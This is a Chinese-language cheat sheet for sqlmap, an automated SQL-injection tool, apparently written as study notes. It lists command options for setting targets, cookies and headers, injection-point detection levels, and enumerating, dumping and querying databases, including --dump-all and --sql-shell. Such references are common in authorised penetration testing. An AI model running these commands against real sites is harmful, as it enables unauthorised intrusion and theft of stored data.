python sqlmap.py
1.目标设置
-u "目标URL及其注入点"
  python sqlmap -u "http://xxx.com?id=1"
2.配置设置
  #Cookie & Session
  --cookie="id=123; session=abc"
  --cookie-delimiter=";"       # 自定义分隔符
  --drop-set-cookie            # 忽略响应的 Set-Cookie
  --load-cookies=<file>        # Netscape 格式 cookie 文件
  #Headers
  --headers="X-Forwarded-For: 127.0.0.1\nUser-Agent: Mozilla/5.0"
  --user-agent="Mozilla/5.0"   # 自定义 UA（也可用 --random-agent）
  --random-agent               # 随机 UA
  --host=<host>                # Host 头
  --referer=<url>              # Referer 头
3.注入点检测
  # 方法
  --method=POST                # 请求方法
  --data "id=1"                #配置post注入点
  -p "id,name"                 # 指定测试参数（逗号分隔）
  --skip="id"                  # 跳过指定参数
  --skip-static                # 跳过非动态参数
  --param-exclude="token"      # 正则排除参数
  --param-del="&"              # 参数分隔符
  --level=1                    # 检测等级 1-5（越高越全面）
  --risk=1                     # 风险等级 1-3（越高越可能破坏数据）
  # level=1: GET/POST 参数
  # level=2: Cookie + User-Agent
  # level=3+: Host + Referer 等
4.查找信息
  # 基本信息
  --banner       # 数据库 banner
  --hostname       # 主机名
  --current-user   # 当前数据库用户
  --current-db     # 当前数据库
  --is-dba         # 是否为管理员
  --dbs                        # 列出所有数据库
  --schema                     # 获取数据库结构
  --tables                     # 获取所有数据库的表
  --tables -D <db>             # 列出指定数据库的表
  --columns -T <table> -D <db> # 列出指定表的列
  --dump -T <table> -D <db>    # 导出表数据
  --dump-all                   # 导出全部数据库
  --exclude-sysdbs             # 排除系统库
  --count               # 统计记录数
  --start=1 --stop=10   # 指定dump查找的列范围
  --where="id>5"        # 条件过滤
  --sql-query="SELECT * FROM users"  # 执行自定义 SQL
  --sql-shell                  # 进入 SQL shell
